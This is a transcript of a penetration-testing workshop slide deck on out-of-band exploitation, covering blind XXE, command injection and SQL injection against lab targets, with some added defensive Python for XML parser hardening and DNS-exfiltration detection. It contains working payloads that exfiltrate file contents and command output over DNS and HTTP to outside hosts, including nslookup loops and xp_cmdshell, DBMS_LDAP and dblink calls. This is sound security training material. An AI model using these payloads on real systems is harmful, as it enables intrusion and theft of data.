Out-of-Band Exploitation for Asynchronous Vulnerabilities · Ashwin Pathak

Post on 11-Aug-2020


Transcript

© Copyright 2020 NotSoSecure Global Services Limited, A Claranet Group Company, all rights reserved.

Out-of-Band Exploitation for Asynchronous Vulnerabilities

SSID: OOB1 or OOB2

Password: Out0fB@nd2020


About NotSoSecure

IT security specialist company providing cutting-edge IT security consultancy and training.

Penetration Testing

• Web Application Security Assessment
• Infrastructure Security Assessment
• Mobile Application Security Assessment
• Source Code Review
• IoT Security Assessment
• Red Team Exercises

Training

● Beginner Friendly
  ○ Hacking 101
  ○ Basic Infrastructure Hacking
  ○ Basic Web Hacking
● Advanced/Specialist Offensive Courses
  ○ Advanced Infrastructure Hacking
  ○ Advanced Web Hacking
  ○ Hacking and Securing Cloud
● Specialist Defensive Courses
  ○ Application Security for Developers
  ○ DevSecOps

For private/corporate training please contact us at training@notsosecure.com


Speakers

Ajay Prashar

• Senior Security Consultant @ NotSoSecure

• 4+ Years of experience

• Research published in the Top Ten Hacking Techniques of 2018 by PortSwigger and Exploit Database (@ExploitDB)

• Researcher and vulnerable app developer @NotSoSecure.

• Connect: @tricksiused


Speakers

Ashwin Pathak

• Senior Security Consultant @NotSoSecure

• Certification : OSCP

• 6.5 Years of experience

• Expertise in Web/Cloud/Network.

• Researcher and vulnerable app developer @NotSoSecure.

• Passionate about making and breaking things.

• Connect: @AshwinPathak26


What will we be looking at?

• Introduction to Out-of-Band (OOB)

• Tools for the Trade

• Understanding DNS and its Limitation

• XML External Entity (XXE) Attack

• Command Injection

• SQL Injection

• Final Challenge


Lab Setup

● Please visit the Google Doc link below and follow the instructions.

○ http://bit.ly/NSS-OOB

○ http://null.oob.lab/setup.pdf

● Targets:

○ https://null.oob.lab

○ https://null.oob.lab:3001

○ https://null.oob.lab:3002

○ https://null.oob.lab:3003

○ https://null.oob.lab:3004

○ https://null.oob.lab:3006


10.1.2.100


Delegate agreement

Any abuse of network privileges beyond the stated aims will result in immediate disqualification from the workshop. Actions that may result in disqualification are:

○ Any activity causing a Denial of Service (DoS)
○ System shutdown
○ Interference in other delegates' work, etc.


OOB Introduction

What? When? Why? How?


What

• The channel used for exploitation or detection is different from the channel the payload was delivered on.

When

• A blind vulnerability is one in which the attacker does not get any output from the malicious activity they performed.

Why

• Time-based attacks are time consuming.

• Out-of-band techniques are quick and stealthy.


Tools for the Trade

• Netcat

• Tcpdump

• Web Servers (Python SimpleHTTP)

• FTP Servers

• Wireshark


Netcat

• Netcat is a computer networking utility for reading from and writing to network connections using TCP or UDP.

• It can make various kinds of connections and is an easy-to-use, efficient network debugging and exploration tool.

• Netcat can work as a client as well as a server.


Tcpdump/Windump

• Command-line packet analyzer.

• Captures and displays TCP/UDP/IP packets.

• It can read packets from a network interface card or from a previously saved packet file, and can also write packets to standard output or a file.

• We will use it for monitoring DNS traffic in our lab.


Python SimpleHTTPServer

• A simple Python web server.

• A web server that enables GET and POST requests.

• Can be used efficiently for OOB requests over HTTP.


Protocols to Leverage OOB Calls

TCP is a connection-oriented protocol, which

means a connection is established and

maintained until the application programs at

each end have finished exchanging

messages

TCP

● HTTP

● FTP

● SMB .etc.

UDP (User Datagram Protocol) is an

alternative communications protocol to

TCP used primarily for establishing low-

latency and loss-tolerating connections

between applications on the internet.

UDP

● DNS

ICMP is used by routers, intermediary

devices or hosts to communicate error

information or updates to other routers,

intermediary devices or hosts.

ICMP

● PING Utility

Reference: https://searchnetworking.techtarget.com


Why DNS for OOB ?

• Egress-hardened firewalls block common protocols such as HTTP and FTP.

• It is difficult to validate a blind injection in the presence of such protections.

• Almost any communication starts with a DNS resolution of an FQDN, so DNS is required everywhere and is less monitored.

• It is hard for a corporation to function if restrictive rules are put on DNS.

• DNS is a good channel for data exfiltration because companies tend to go easy on DNS communication.


DNS Limitations

● A domain name can have a maximum of 127 labels (subdomains).

● Each label can be at most 63 characters long.

● The maximum length of a full domain name is 253 characters.

● Because DNS records are cached, a unique value is required in the domain name for each request, otherwise a repeated query never leaves the resolver.

● DNS is a plaintext channel: any data extracted over DNS is in cleartext and is visible to intermediary nodes and DNS server caches. Hence, it is recommended not to exfiltrate sensitive data over DNS.


XML External Entity (XXE) Basics

• An XXE attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser, leading to sensitive data exposure, denial of service, Server-Side Request Forgery (SSRF), port scanning, etc.

• Blind XXE: in certain cases the XML external entities are processed on the server side, yet the response reveals no information that confirms the XXE was executed.


Blind XXE Detection

• For OOB detection an attacker can craft payloads which generate requests for an external entity.

• Before any communication starts to fetch the external entity, DNS resolution will take place.

• Sample protocols/payloads
  • HTTP: <!ENTITY test SYSTEM 'ldap://oob.dnsattacker.com:port'>
  • SMB: <!ENTITY test SYSTEM '\\notsosecure.com\abc.txt'>
  • Gopher: <!ENTITY test SYSTEM 'gopher://oob.dnsattacker.com:port/%data%'>


Exercise - XXE : DNS for Detection

• Identify the XML External Entity vulnerability by making the host send DNS requests to an external host.

Challenge URL: http://null.oob.lab


XXE Exploitation over HTTP Channel

• For OOB exploitation over the HTTP channel, an attacker can craft payloads which contain requests for an externally hosted Document Type Declaration (DTD), which can be used for exploiting this vulnerability.

• What is a DTD?
  • It defines the valid building blocks of an XML document.
  • It defines the structure of a document using a list of validated elements and attributes.
  • A DTD can be declared in various ways: inline inside an XML document, or as an external reference.
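The two ends of the "weakly configured parser" the slides describe, as an added example written for this page (not workshop material): one resolver follows whatever SYSTEM identifier an inline DTD names, the other refuses any DOCTYPE, so neither an inline nor an external DTD can declare an entity. The secret file, the XML document and all function names are constructed for the illustration.

```python
import os
import tempfile
import xml.parsers.expat as expat

# Constructed stand-in for the '/etc/passwd' the demo reads, written to a temp dir
# so this runs anywhere without touching real system files.
SECRET_PATH = os.path.join(tempfile.mkdtemp(), "secret.txt")
with open(SECRET_PATH, "w", encoding="utf-8") as fh:
    fh.write("constructed-secret-value")

# Constructed XXE document: an inline DTD declares an external entity, the body references it.
XXE_DOC = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE data [ <!ENTITY xxe SYSTEM "%s"> ]>\n'
    '<data>&xxe;</data>' % SECRET_PATH
).encode("utf-8")


def vulnerable_parse(xml_bytes):
    """Weakly configured parser: follows whatever SYSTEM identifier the document names.
    A parser in this state would equally open http://, ftp:// or UNC identifiers,
    which is the out-of-band channel the workshop exploits."""
    parser = expat.ParserCreate()
    text = []

    def fetch_external_entity(context, base, system_id, public_id):
        child = parser.ExternalEntityParserCreate(context)  # child parser inherits our handlers
        with open(system_id, "rb") as fh:                    # local paths only in this example
            child.Parse(fh.read(), True)
        return 1                                             # non-zero = entity resolved

    parser.ExternalEntityRefHandler = fetch_external_entity
    parser.CharacterDataHandler = text.append
    parser.Parse(xml_bytes, True)
    return "".join(text)


def safe_parse(xml_bytes):
    """Hardened parser: refuse any DOCTYPE, so no entity (internal or external) can be declared."""
    parser = expat.ParserCreate()
    text = []

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise ValueError("DOCTYPE '%s' rejected: DTDs are not accepted from untrusted input" % name)

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = lambda *args: 0        # belt and braces: never resolve one
    parser.CharacterDataHandler = text.append
    parser.Parse(xml_bytes, True)
    return "".join(text)


def rejects(xml_bytes):
    """True when the hardened parser refuses the document."""
    try:
        safe_parse(xml_bytes)
    except ValueError:
        return True
    return False
```

Running `vulnerable_parse(XXE_DOC)` returns the file contents in place of the entity, which is the information an OOB channel would carry out; `safe_parse` stops at the DOCTYPE before any entity exists.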


DEMO- XXE : HTTP for Exploitation [Windows/Linux]

• Exploit the XML External Entity vulnerability to make the host send HTTP requests to an external web server containing contents of ‘/etc/passwd’ file.

Challenge URL: http://null.oob.lab


XXE Exploitation over HTTP+FTP Channel

• HTTP breaks for
  • an invalid character, such as #
  • or when the URL length is exceeded.

• How does this work?
  • The vulnerable XML app loads the external malicious DTD schema via an HTTP request to a web server, performs the operation and makes an external entity request via FTP from ftp://host:port/%data;


Exercise - XXE : FTP for Exfiltration

• Exploit the XML External Entity vulnerability to extract contents of ‘C:/Windows/win.ini’ file using combination of HTTP and FTP.

Challenge URL: http://null.oob.lab

Reference: https://github.com/staaldraad/xxeserv


Stealing Hashes?

• SMB protocol: shared access to files, printers, and serial ports between nodes on a network.

• SMB in XXE:
  • SMB: <!ENTITY test SYSTEM '\\notsosecure.com\abc.txt'>


CVE-2018-0878

• Microsoft Windows Remote Assistance - XML External Entity Injection: https://krbtgt.pw/windows-remote-assistance-xxe-vulnerability

• An information disclosure vulnerability exists when Windows Remote Assistance incorrectly processes XML External Entities (XXE).


Command/Code Injection

• Execution of arbitrary commands or code on the host system.

• Blind injection?
  • Blind vulnerabilities do not return the output of the command in the HTTP response.

• How to detect?
  • The injected command can be used to create an out-of-band network interaction with a system controlled by us.


Example: An attacker can craft payloads which generate DNS queries via command injection.

• Sample payload
  • nslookup test.oob.dnsattacker.com or dig test.oob.dnsattacker.com


Exercise - DNS for Exploitation

• Extract the output for the command ‘hostname’ over DNS Queries.

Challenge URL: http://null.oob.lab:3006


For Large Outputs and Files

1. Encoding: encode the command output so that it can be transferred over the DNS channel without breaking the DNS query syntax (data handling).

2. Dividing: break the output into subdomain sizes suitable for DNS queries.

3. Sending: send the divided output over the DNS channel by performing DNS queries.

4. Reconstructing: reconstruct the output by collecting, rearranging and decoding the DNS queries.


Exercise - DNS for exploitation

• Extract the output for the command ‘ver’ over DNS queries.

• Windows

Challenge URL: http://null.oob.lab:3006


The Magic Payload

cmd /v /c "ver > output && certutil -encodehex -f output output.hex 4 && powershell $text=Get-Content output.hex;$subdomain=$text.replace(' ','');$j=11111;foreach($i in $subdomain){ $final=$j.tostring()+'.'+$i+'.live.null.oob.lab';$j += 1; nslookup $final }"


• Dissecting the command
  • ver > output && certutil -encodehex -f output output.hex 4
  • powershell $text=Get-Content output.hex;$subdomain=$text.replace(' ','');
  • $j=11111;foreach($i in $subdomain){ $final=$j.tostring()+'.'+$i+'.live.null.oob.lab';$j += 1; nslookup $final }
  • cmd /v /c

• Linux version
  • var=11111 && for i in $(ifconfig|base64|awk '{gsub(/.{50}/,"&\n")}1'); do var=$((var+1)) && nslookup $var.$i.file.oob.dnsattacker.com; done#


Exploitation over other channels

● Command output can also be appended to HTTP requests
  ○ In HTTP request headers, query parameters, etc.

● Some native utilities to create web requests:
  ○ Windows: PowerShell, Mshta, Certutil.exe
  ○ Linux: wget, curl

● Command output via the ICMP channel (ping)


SQL Injection

• SQLi vulnerabilities arise when user-supplied data becomes part of SQL queries in an unsafe manner.

• In certain cases applications that are vulnerable to SQL injection still do not reveal much information in the application response.

• In such cases built-in SQL functions can be used to confirm and then exploit the vulnerability.


MariaDB(MySQL)

Some of the functions to produce out-of-band calls are as follows:

● OUTFILE

○ SELECT 'a' INTO OUTFILE '\\\\aaaa.null.oob.lab\\foo$';

● LOAD_FILE

○ SELECT LOAD_FILE(CONCAT('\\\\', (SELECT HEX(CONCAT(user(),"\n"))), '.null.oob.lab\\test.txt'));


Exercise - DNS for MariaDB (MySQL)

• Identify the SQL Injection vulnerability to make the host send DNS requests to an external host.

Challenge URL: http://null.oob.lab:3003


MSSQL

In MSSQL an attacker can use the following functions to create out-of-band calls:

• BULK INSERT

BULK INSERT employees FROM "\\aaa.ashwin.sos.notsosecure.com\foo$";

• xp_dirtree

DECLARE @data varchar(1024); SELECT @data = (SELECT system_user); EXEC('master..xp_dirtree"\\'+@data+'.ashwin.sos.notsosecure.com\foo$"');


Demo: DNS for MSSQL

• Identify the SQL Injection vulnerability to make the host send DNS requests to an external host.

Challenge URL: http://null.oob.lab:3002


Misconfigured Oracle

Some methods to create DNS queries are:

• UTL_HTTP

SELECT utl_http.request('http://aaa.ashwin.sos.notsosecure.com/') FROM dual;

• DBMS_LDAP

SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.attacker.com',80) FROM dual;

• XXE in Oracle 11g

select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://cccc.ashwin.sos.notsosecure.com/test"> %remote; ]>'),'/l') from dual


Exercise - DNS for Oracle

• Identify the SQL Injection vulnerability to make the host send DNS requests to an external host.

Challenge URL: http://null.oob.lab:3001


PostgreSQL

In the case of PostgreSQL, the following function can be used to create out-of-band calls:

• dblink_connect

CREATE EXTENSION dblink; SELECT dblink_connect('host=c444444.ashwin.sos.notsosecure.com user=postgres password=password dbname=pg_sitepoint');


Demo: DNS for PostgreSQL

• Identify the SQL Injection vulnerability to make the host send DNS requests to an external host.

Challenge URL: http://null.oob.lab:3004


Tips for Final Challenge

• You can use the command injection payload used earlier, with some additional changes to make it suitable for SQL injection.


Final Challenge : Exfiltrate Large command Output via DNS

• Use the SQL Injection vulnerability to exfiltrate command output of ‘ipconfig/ifconfig’ to an external host using DNS queries.

Challenge URL: http://null.oob.lab:3002


'; exec master..xp_cmdshell 'cmd /v /c "ipconfig > output && certutil -encodehex -f output output.hex 4 && powershell $text=Get-Content output.hex;$subdomain=$text.replace(' ','');$j=11111;foreach($i in $subdomain){ $final=$j.tostring()+'.'+$i+'.live.null.oob.lab';$j += 1; nslookup $final }" ' --

Sample command to rebuild the output from the captured queries (see https://www.notsosecure.com/oob-exploitation-cheatsheet/):

egrep -o '[0-9]{5}+\.+[0-9a-fA-F]{0,62}' file.txt|sort -u|cut -d. -f2|xxd -r -p
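A defender's counterpart to the four steps (encode, divide, send, reconstruct) and to the egrep reconstruction command, added here as an example and not taken from the workshop: it scans tcpdump-style DNS query lines for the counter-prefixed hex labels this payload produces, collapses resolver retries, reports sequence gaps so an incident responder knows whether the recovered file is complete, and decodes what left the network. The capture lines, the client address and the zone name are constructed for the illustration.

```python
import re
from collections import defaultdict

# Query-name shape emitted by the workshop payload: <5-digit counter>.<hex chunk>.<zone>
EXFIL_RE = re.compile(r"^(?P<seq>\d{5})\.(?P<hex>[0-9a-fA-F]{2,62})\.(?P<zone>[A-Za-z0-9.-]+?)\.?$")
# tcpdump -n line for a DNS query, e.g. "... IP 10.1.2.100.51234 > 10.1.2.1.53: 4242+ A? name. (45)"
TCPDUMP_RE = re.compile(r"IP (?P<src>\d+(?:\.\d+){3})\.\d+ > \S+: \d+\+? (?:A|AAAA)\? (?P<qname>\S+) ")


def reconstruct(lines, min_chunks=3):
    """Find clients emitting counter-prefixed hex labels and rebuild what each one sent.
    Returns {(client, zone): {"chunks": n, "missing": [seq, ...], "data": text}}."""
    seen = defaultdict(dict)                                   # (client, zone) -> {seq: hex chunk}
    for line in lines:
        pkt = TCPDUMP_RE.search(line)
        if not pkt:
            continue
        m = EXFIL_RE.match(pkt.group("qname"))
        if not m:
            continue
        key = (pkt.group("src"), m.group("zone"))
        seen[key][int(m.group("seq"))] = m.group("hex").lower()  # resolver retries collapse here
    findings = {}
    for key, by_seq in seen.items():
        if len(by_seq) < min_chunks:
            continue                                           # lone queries are detection pings, not bulk transfer
        lo, hi = min(by_seq), max(by_seq)
        missing = [s for s in range(lo, hi + 1) if s not in by_seq]
        hexdata = "".join(by_seq[s] for s in sorted(by_seq))
        try:
            data = bytes.fromhex(hexdata).decode("utf-8", "replace")
        except ValueError:                                     # odd-length chunk: not cleanly hex-encoded
            data = None
        findings[key] = {"chunks": len(by_seq), "missing": missing, "data": data}
    return findings


# Constructed sample capture (not real traffic): text an 'ipconfig' might print, sent the way the payload does.
SAMPLE_TEXT = "Windows IP Configuration\r\n   IPv4 Address. . . : 10.1.2.100\r\n"
SAMPLE_KEY = ("10.1.2.100", "live.null.oob.lab")               # constructed client and zone


def constructed_capture(text, client=SAMPLE_KEY[0], zone=SAMPLE_KEY[1], start=11111):
    """tcpdump-style lines as the payload would produce them: one label per 16 bytes (one certutil hex line)."""
    hexdata = text.encode("utf-8").hex()
    chunks = [hexdata[i:i + 32] for i in range(0, len(hexdata), 32)]
    return ["12:00:%02d.000000 IP %s.5%04d > 10.1.2.1.53: %d+ A? %d.%s.%s. (60)"
            % (n % 60, client, n, 1000 + n, start + n, chunk, zone) for n, chunk in enumerate(chunks)]


SAMPLE_LINES = list(reversed(constructed_capture(SAMPLE_TEXT)))  # chunks arrive out of order
SAMPLE_LINES.insert(0, SAMPLE_LINES[-1])                         # one chunk was retried
SAMPLE_LINES.append("12:00:59.000000 IP 10.1.2.7.40000 > 10.1.2.1.53: 7+ A? www.example.com. (33)")  # benign

if __name__ == "__main__":
    for (client, zone), f in reconstruct(SAMPLE_LINES).items():
        print(client, "->", zone, ":", f["chunks"], "chunks, missing", f["missing"])
        print(f["data"])
```

Unlike the egrep pipeline, a non-empty `missing` list tells you the captured file is incomplete before you act on its contents; in production the zone list would come from configuration rather than the regex.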


• Dissecting the command
  • ipconfig > output && certutil -encodehex -f output output.hex 4
  • powershell $text=Get-Content output.hex;$subdomain=$text.replace(' ','');$j=11111;foreach($i in $subdomain){ $final=$j.tostring()+'.'+$i+'.live.null.oob.lab';$j += 1; nslookup $final }
  • Encoding the above command to PowerShell-specific base64
  • cmd /v /c


Burp Suite Collaborator

● A network service which helps to discover blind vulnerabilities such as SQL Injection, XXE, Cross-Site Scripting, etc.

● Uses a specially crafted dedicated domain name and reports findings as issues such as External Service Interaction, SQL Injection, etc.

Reference : https://portswigger.net/burp/documentation/collaborator

• Web Alternative: swin.es/o


Making Sockets Public

• NGROK
• Cloud VM instances:
  • SSH port forwarding
  • Dynamic DNS and port forwarding


Case Studies

NotSoSecure:

• Blind RCE due to Java Deserialization vulnerability.
• Path Traversal to Blind Remote Code Execution using Blacklist3r and YSoSerial.NET


Key Workshop Takeaways

• There are multiple ways and techniques to write the payload and build the setup for OOB.

• Why DNS can be your go-to technique.

• Tools and techniques for basic to advanced setups.


Thank You
